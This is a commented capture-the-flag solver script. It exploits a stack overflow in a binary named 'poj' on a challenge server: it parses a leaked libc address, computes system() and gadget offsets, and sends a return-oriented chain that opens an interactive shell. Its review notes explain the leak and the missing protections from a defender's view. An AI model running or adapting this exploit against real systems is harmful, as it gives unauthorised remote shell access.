#!/usr/bin/python3
"""Solver script for the "poj" challenge binary.

Flow, as visible in this script:
  1. The service prints a hexadecimal value after a ": " prompt; the script
     treats it as the runtime address of libc's write().
  2. The libc base, system() and a string address are derived from that value
     using fixed offsets.
  3. 72 filler bytes followed by a short return-oriented chain are sent, and
     the session is then handed to the operator.

Review notes (defender's view):
  - A service that prints a libc pointer removes the protection ASLR gives to
    libc: every other address used below is a constant offset from it.
  - The offsets are hard-coded, so they only hold for one specific libc build.
    NOTE(review): the build they were taken from is not recorded here.
  - The filler runs straight into the chain with no preserved canary value, so
    the target was presumably built without stack protection -- confirm with
    checksec (checksec=False below only silences the report).
"""
from pwn import *

# Load the local copy of the binary and let pwntools take arch/endianness
# from it, so p64() packs for the right target.
target = ELF("./poj", checksec=False)
context.binary = target

# Local testing alternative:
# io = process()
io = remote("challenge.bugpwn.com", 1003)

# --- leak -------------------------------------------------------------------
# Skip the prompt up to ": " and parse the rest of the line as a hex integer.
io.recvuntil(b": ")
write_addr = int(io.recvline().strip(), 16)

# Fixed offsets into libc (valid for a single libc build only, see above).
libc_base = write_addr - 0xff4d0
system = libc_base + 0x4dab0
sh = libc_base + 0x197e34  # presumably a shell-path string in libc -- confirm

for fmt, value in (
    ("write: 0x%lx", write_addr),
    ("libc: 0x%lx", libc_base),
    ("system: 0x%lx", system),
):
    log.info(fmt, value)

# --- gadgets ----------------------------------------------------------------
pop_rdi = libc_base + 0x28215  # pop rdi; ret (per the name) -- TODO confirm

# --- payload ----------------------------------------------------------------
# 72 bytes of filler, then four 8-byte words. pop_rdi + 1 points one byte past
# the gadget; presumably a bare `ret` used to keep the stack 16-byte aligned
# before system() is entered.
payload = b"".join(
    [
        b"A" * 72,
        p64(pop_rdi),
        p64(sh),
        p64(pop_rdi + 1),
        p64(system),
    ]
)

io.sendline(payload)
io.interactive()